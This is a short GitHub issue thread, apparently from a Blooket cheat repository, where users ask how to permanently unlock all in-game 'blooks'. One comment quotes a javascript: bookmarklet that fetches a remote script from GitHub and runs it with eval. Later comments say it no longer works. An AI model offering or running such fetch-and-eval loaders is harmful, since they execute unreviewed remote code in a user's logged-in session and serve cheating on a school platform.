### ISSUE TITLE
Any way to permanently get all blooks?

### ISSUE THREAD

**Issue by ConnorCodesatSchool** [glixzzy/blooket-hack#396]
You can only get it in game, I want it in the Manage Blooks menu. Is that possible, or is that on Blooket's servers end?

**Comment by Ihatr1** [comment]
Nope. 

Adding blooks to an account is done through Blooket's servers, there's no way to manipulate that to add certain blooks.

**Comment by ammoVR3** [comment]
Yes there is @ConnorCodesatSchool  it does not like give them to you but you can click on them and pretend to sell them

**Comment by wolfgoo** [comment]
What is this???

**Comment by yesskiable** [comment]
doesn 't work any more

**Comment by yesskiable** [comment]
> Yes there is @ConnorCodesatSchool it does not like give them to you but you can click on them and pretend to sell them the code is javascript:fetch("[https://raw.githubusercontent.com/rebound37/BlooketUnlockAllPerm/main/unlockAllBlooksForever.js").then((res)](https://raw.githubusercontent.com/rebound37/BlooketUnlockAllPerm/main/unlockAllBlooksForever.js%22).then((res)) => res.text().then((t) => eval(t)))

can you put the link to all of the code from them

**Comment by Vanniecat** [comment]
It says 404 not found or something like that
